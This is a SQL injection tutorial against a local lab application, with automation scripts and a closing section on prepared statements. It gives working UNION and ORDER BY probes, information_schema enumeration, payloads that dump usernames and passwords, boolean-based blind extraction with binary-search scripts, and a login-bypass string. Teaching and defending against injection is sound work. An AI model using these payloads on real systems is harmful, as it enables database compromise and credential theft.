Introduction:-
With the help of the UNION operator and the ORDER BY clause, an attacker can dump the entire database behind a web application that is vulnerable to SQL injection.
Attack flow
- App sends a form to the user.
- Attacker submits the form with SQL exploit data in one of the fields.
- Application builds the query string with the exploit data embedded in it.
- Application sends the SQL query to the DB.
- DB executes the query, including the injected SQL, and sends the data back to the application.
- Application returns the data to the attacker.
Injecting into SELECT
Most common SQL entry point.
SELECT columns
FROM table
WHERE expression
ORDER BY expression
Places where user input is inserted:
WHERE expression
ORDER BY expression
Table or column names
UNION
Combines SELECTs into one result.
SELECT cols FROM table WHERE expr
UNION
SELECT cols2 FROM table2 WHERE expr2
Allows the attacker to read any table. Typed into a field whose value lands inside a quoted string literal:
user' UNION SELECT number FROM cc--
(the injected quote closes the original literal, and -- comments out whatever the application appends after it).
Requirements
Both SELECTs must return the same number of columns, with compatible types in each position.
The attacker needs to know the name of the other table (and of a column in it).
The DB returns the combined result under the column names of the 1st query, so the injected data shows up wherever the application prints those columns.
Finding #columns with NULL (NULL is compatible with every column type, so add one per attempt until the error disappears)
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
Finding #columns with ORDER BY (sorting by column position n fails as soon as n exceeds the column count)
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
Finding a string column to extract data (a string literal is accepted only in a position whose type is compatible with text; a position that is also displayed by the page is the one that can carry the stolen data)
' UNION SELECT 'a', NULL, NULL--
' UNION SELECT NULL, 'a', NULL--
' UNION SELECT NULL, NULL, 'a'--
Inference Attacks
Problem: What if the app doesn't print the data?
The injection can still produce detectable behavior:
Successful or failed web page.
Noticeable time delay or absence of delay.
Identify an exploitable URL (same page for the true condition, a different page or an error for the false one):
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=1
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1 and 1=2
Use a condition to identify one piece of data at a time (SQL Server syntax, hence TOP 1; the subquery must be wrapped in its own parentheses):
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) = 1
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) = 2
... or use a binary search technique ...
SUBSTRING((SELECT TOP 1 number FROM cc), 1, 1) > 5
Each request answers one yes/no question; halving the candidate range on every request takes about 4 requests for a digit and about 7 for a printable ASCII character, instead of trying each value in turn.
You can also specify a column number instead of a column name in ORDER BY.
Sample:
SELECT * FROM users ORDER BY 2
Result (sorted by the 2nd column, Name):
Id | Name  |
3  | David |
2  | John  |
1  | Malik |
INFORMATION_SCHEMA
The information_schema database stores metadata about all the other databases that the MySQL server maintains (schema, table and column names); a user sees only the objects they hold some privilege on, which is still everything the application account can read.
Getting information from the information_schema database:
SELECT * FROM information_schema.tables
Listing only the tables of the currently selected database:
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
Listing the columns of a specific table (add AND table_schema=database() if another schema may contain a table of the same name):
SELECT column_name FROM information_schema.columns WHERE table_name='users'
Web page:
- Here we have a page that displays post contents based on a given ID.
- When the ID is "1", it displays the following content.
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=1
Display:-
Subject | First Post |
Messaged by | Admin |
- When the ID is "2", it displays the following content.
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2
Display:-
Subject | Second Post |
Messaged by | Admin |
- We already know that the UNION operator only works if the number of columns is equal.
- So we need to find the number of columns currently being selected.
- To achieve that, we will use the ORDER BY clause.
Finding the number of columns:
ORDER BY 1
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 1
The post is displayed normally (the query succeeded).
ORDER BY 2
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 2
The post is displayed normally.
ORDER BY 3
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 3
The post is displayed normally.
ORDER BY 4
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 4
The post is displayed normally.
ORDER BY 5
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=2 order by 5
You get an error message: Unknown column '5' in 'order clause'.
- When we send the "ORDER BY 5" query, we get the 'Unknown column' error.
- This indicates that the result of the SELECT statement has only 4 columns.
- Now use UNION to execute our own SELECT statement. The messageid is set to -1, which matches no existing post, so only the row produced by the injected SELECT is rendered; the literals 1,2,3,4 reveal which column positions the page prints.
Request:
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,3,4
Display message:-
Subject | 3 |
Messaged by | 4 |
Getting the MySQL username:
Request (user() goes in the 3rd position, because that is the column rendered as Subject):
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,user(),4
Display message:-
Subject | root@localhost |
Messaged by | 4 |
The application connects as root, so every injected query runs with full privileges on the MySQL server.
Getting the list of tables:
Request (group_concat() folds every table name into one string, so the whole list fits in the single reflected column):
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()
Display message:-
Subject | cards,fileslist,form_post,messages,tdata,user_master,usermessages |
Messaged by | 4 |
Dumping data:
Let's dump the usernames and passwords from the 'user_master' table (its column names are read from information_schema.columns where table_name='user_master', as shown above).
Request:
http://localhost:8080/waed/vulnerability/hacking.jsp?messageid=-1 union select 1,2,group_concat(username,':',password),4 from user_master
Display message:-
Subject | (every username:password pair in user_master, comma-separated) |
Messaged by | 4 |
Note that group_concat() output is cut off at group_concat_max_len (1024 bytes by default), so a large table has to be read in slices with LIMIT and OFFSET.
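The column-count probes, the reflected-column probe and the UNION enumeration and dump above, carried out end to end by a script. This is an added example, not code from the original page or from the waed application: page() is a constructed stand-in for hacking.jsp backed by an in-memory SQLite database with made-up rows, and sqlite_master stands in for information_schema.tables, which SQLite does not have.

```python
import sqlite3

# Constructed stand-in for the vulnerable hacking.jsp page: an in-memory SQLite
# database with a few sample rows, and a lookup that pastes the messageid
# parameter straight into the SQL string (no parameter binding).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE messages(id INTEGER, subject TEXT, body TEXT, author TEXT);
        INSERT INTO messages VALUES (1, 'First Post', 'hello', 'Admin');
        INSERT INTO messages VALUES (2, 'Second Post', 'world', 'Admin');
        CREATE TABLE user_master(username TEXT, password TEXT);
        INSERT INTO user_master VALUES ('admin', 's3cret');
        INSERT INTO user_master VALUES ('malik', 'pass123');
    """)
    return db

DB = build_db()

def page(messageid):
    """Renders a post the way hacking.jsp does: only Subject and Messaged by."""
    sql = "SELECT id, subject, body, author FROM messages WHERE id = " + messageid
    try:
        rows = DB.execute(sql).fetchall()
    except sqlite3.Error:
        return "Oops, Something Went wrong"   # generic error page
    if not rows:
        return "No such post"
    _id, subject, _body, author = rows[0]
    return f"Subject | {subject} | Messaged by | {author}"

def count_columns(max_cols=20):
    """ORDER BY n succeeds while n <= number of selected columns; the first n
    that produces an error is one past the column count."""
    for n in range(1, max_cols + 1):
        if page(f"2 ORDER BY {n}").startswith("Oops"):
            return n - 1
    raise RuntimeError("column count exceeds max_cols")

def union_payload(ncols, position, expr, from_clause=""):
    """'-1 UNION SELECT 1,2,<expr>,4 [FROM ...]': -1 matches no real post, so
    only the attacker-controlled row is rendered."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[position - 1] = expr
    payload = "-1 UNION SELECT " + ",".join(cols)
    return payload + (" " + from_clause if from_clause else "")

def find_reflected_column(ncols):
    """Put a marker string in each position in turn; the first position whose
    marker shows up in the rendered page is the one data can be read through."""
    for pos in range(1, ncols + 1):
        if "zq7marker" in page(union_payload(ncols, pos, "'zq7marker'")):
            return pos
    raise RuntimeError("no column is reflected in the page")

def union_extract(expr, from_clause=""):
    ncols = count_columns()
    pos = find_reflected_column(ncols)
    html = page(union_payload(ncols, pos, expr, from_clause))
    return html.split(" | ")[1]          # the value rendered as Subject

def list_tables():
    # SQLite has no information_schema; sqlite_master plays the role that
    # information_schema.tables plays in the MySQL requests above.
    return union_extract("group_concat(name)",
                         "FROM sqlite_master WHERE type='table'").split(",")

def dump_credentials():
    # MySQL: group_concat(username,':',password); SQLite concatenates with ||
    return union_extract("group_concat(username || ':' || password)",
                         "FROM user_master").split(",")

if __name__ == "__main__":
    print(count_columns())       # 4
    print(list_tables())         # ['messages', 'user_master']
    print(dump_credentials())    # ['admin:s3cret', 'malik:pass123']
```

The script counts columns with ORDER BY, finds which position the page renders by planting a marker string in each one (the string-column probe from the UNION section), and only then sends the group_concat() payloads. Against a live target the same functions would wrap an HTTP request instead of DB.execute().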
Blind Injection:
Blind SQL injection is a type of SQL injection vulnerability in which the web application is vulnerable to SQL injection, but the results of the injection are not displayed.
Boolean-based blind SQL injection:
- By sending queries that evaluate to true or false to the server, an attacker is able to compromise the entire database.
- By comparing the response to the true query with the response to the false query, an attacker can perform blind SQL injection.
Boolean operators:
1=1 → true
1=2 → false
Baseline request to download a file (an always-true condition changes nothing, so the file is still returned; a false condition such as 1=2 yields "File not found"):
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=2 and 1=1
Determining the database server version:
1. Checking whether the database server version is 4.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=4
Display message:
File not found
2. Checking whether the database server version is 5.x
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(version(),1,1)=5
Display message:
The PDF file is downloaded, so the database server version is 5.x.
Determining the length of the database name:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=x
x is the length of the database name.
1. Checking whether the database name length is 1
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=1
Display message:
File not found
2. Checking whether the database name length is 3
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=3
Display message:
File not found
3. Checking whether the database name length is 6
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and character_length(database())=6
The PDF file is downloaded, so the database name length is 6.
Determining the first character of the database name:
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)='x'
Here, x is the first character of the database name.
1. Checking whether the first character of the database name is 'a'
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database())='a'
Display message:
Oops, Something Went wrong
This request omits the start and length arguments of substring(), so MySQL rejects the statement and the application shows its generic error page instead of "File not found". That is a third response class, distinct from true (file downloaded) and false (File not found), and it tells you the injected SQL never ran. The well-formed probe is ... and substring(database(),1,1)='a', which yields "File not found" because the first character is not 'a'.
2. Checking whether the first character of the database name is 'b'
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)='b'
Display message:
File not found
http://localhost:8080/waed/vulnerability/sqli/download_id.jsp?fileid=1 and substring(database(),1,1)='h'
The PDF file is downloaded, so the first letter of the database name is 'h'.
Likewise we can get the 2nd, 3rd, 4th, 5th and 6th letters by moving the start position of substring(), because the total length of the database name is 6. Rather than trying every letter in turn, compare ascii(substring(database(),i,1)) against a threshold and binary-search the character range, as in the inference section above; that needs about 7 requests per character.
On successful exploitation, the attacker obtains the database name (hackdb).
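The inference attack from the earlier section and the length and character extraction just shown, automated with binary search instead of one request per candidate value. Added example, not code from the page or from the waed application: download_page() is a constructed stand-in for download_id.jsp over an in-memory SQLite database, the user_master row and its password are made up, and SQLite's length(), substr() and unicode() take the place of MySQL's character_length(), substring() and ascii().

```python
import sqlite3

# Constructed stand-in for download_id.jsp: the fileid parameter is pasted into
# the query, and the page answers only "downloading ..." / "File not found"
# (or a generic error), never with query data. The user_master table is made
# up here so that there is a secret worth extracting.
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE files(id INTEGER, name TEXT);
        INSERT INTO files VALUES (1, 'report.pdf');
        CREATE TABLE user_master(username TEXT, password TEXT);
        INSERT INTO user_master VALUES ('admin', 'h4ckdb!');
    """)
    return db

DB = build_db()
REQUESTS = {"count": 0}   # how many HTTP requests the attack would take

def download_page(fileid):
    REQUESTS["count"] += 1
    sql = "SELECT name FROM files WHERE id = " + fileid
    try:
        rows = DB.execute(sql).fetchall()
    except sqlite3.Error:
        return "Oops, Something Went wrong"   # SQL error: third response class
    return f"downloading {rows[0][0]}" if rows else "File not found"

def oracle(condition):
    """True iff 'fileid=1 and <condition>' still returns the file."""
    return download_page("1 and " + condition).startswith("downloading")

def binary_search(lo, hi, greater_than):
    """Find the secret value v in [lo, hi] given only an oracle answering
    'is v > mid?'. Each request halves the interval, so about log2(hi - lo)
    requests per value instead of one per candidate."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo

def blind_extract(expr, max_len=64):
    """Recover the string value of a SQL expression one character at a time.
    MySQL equivalents of the probes below:
      character_length((expr)) > n
      ascii(substring((expr), i, 1)) > c"""
    length = binary_search(0, max_len,
                           lambda n: oracle(f"length(({expr})) > {n}"))
    chars = []
    for i in range(1, length + 1):
        code = binary_search(
            0, 127,
            lambda c, i=i: oracle(f"unicode(substr(({expr}),{i},1)) > {c}"))
        chars.append(chr(code))
    return "".join(chars)

if __name__ == "__main__":
    secret = blind_extract("SELECT password FROM user_master WHERE username='admin'")
    print(secret, "recovered in", REQUESTS["count"], "requests")
```

Recovering a 7-character value this way costs 7 requests for the length plus 7 per character, about 56 in total; probing every printable character in turn could take over 600. The same oracle() works for any expression that returns a string, so the database name, the version string or a column value are all extracted by the same loop.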
Prevention: prepared statements (parameterized queries)
How does this prevent an attack?
- The SQL statement you pass to prepare is parsed and compiled by the database server before any user input is involved.
- By specifying parameters (either a ? or a named parameter like :name) you tell the database engine where the values will be supplied.
- When you call execute, the prepared statement is combined with the parameter values you specify.
- It works because the parameter values are bound to the already compiled statement, not spliced into a SQL string.
- SQL injection works by tricking the script into including malicious strings when it creates the SQL to send to the database. By sending the actual SQL separately from the parameters, you cannot end up with a statement you didn't intend.
- Parameters carry values only. Table and column names and ORDER BY targets (the other injection points listed above) cannot be bound, so they must be checked against an allowlist of known identifiers before they go into the query text.
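The vulnerable concatenation beside its prepared-statement replacement, as an added example (not the page's code, and Python rather than JSP): the sqlite3 driver's ? placeholders bind values the same way a JDBC PreparedStatement does. The users table and its rows are constructed here, and the allowlist for the ORDER BY column is the example's own addition.

```python
import sqlite3

# Constructed users table for the demonstration; the rows are made up.
DB = sqlite3.connect(":memory:")
DB.executescript("""
    CREATE TABLE users(id INTEGER, name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'Malik', 'pass123');
    INSERT INTO users VALUES (2, 'John',  'hunter2');
    INSERT INTO users VALUES (3, 'David', 'letmein');
""")

def login_vulnerable(name, password):
    """String concatenation: the password field becomes part of the SQL grammar.
    With password = "' OR '1'='1" the WHERE clause reads
    name = 'Malik' AND password = '' OR '1'='1', which is always true."""
    sql = ("SELECT id FROM users WHERE name = '" + name +
           "' AND password = '" + password + "'")
    return DB.execute(sql).fetchone() is not None

def login_safe(name, password):
    """Prepared statement: the SQL text is fixed before the values are bound,
    so quotes in the inputs are just characters in a string, never grammar."""
    sql = "SELECT id FROM users WHERE name = ? AND password = ?"
    return DB.execute(sql, (name, password)).fetchone() is not None

# Binding covers values only. Identifiers (table or column names, ORDER BY
# targets) cannot be parameters, so they are checked against an allowlist.
ALLOWED_SORT = {"id", "name"}

def is_allowed_sort(column):
    return column in ALLOWED_SORT

def users_sorted_by(column):
    if not is_allowed_sort(column):
        raise ValueError(f"unsupported sort column: {column!r}")
    # Safe to interpolate: the identifier was chosen from the fixed allowlist.
    return [row[0] for row in DB.execute(f"SELECT name FROM users ORDER BY {column}")]

if __name__ == "__main__":
    bypass = "' OR '1'='1"
    print(login_vulnerable("Malik", bypass))   # True: the OR makes the WHERE always true
    print(login_safe("Malik", bypass))         # False: compared literally to the password
    print(users_sorted_by("name"))             # ['David', 'John', 'Malik']
```

The safe version never builds SQL from the inputs, so the same payload that bypasses the vulnerable login is simply a password that does not match. The ORDER BY helper shows the remaining gap: an identifier still reaches the query text, and the allowlist check is what keeps it honest.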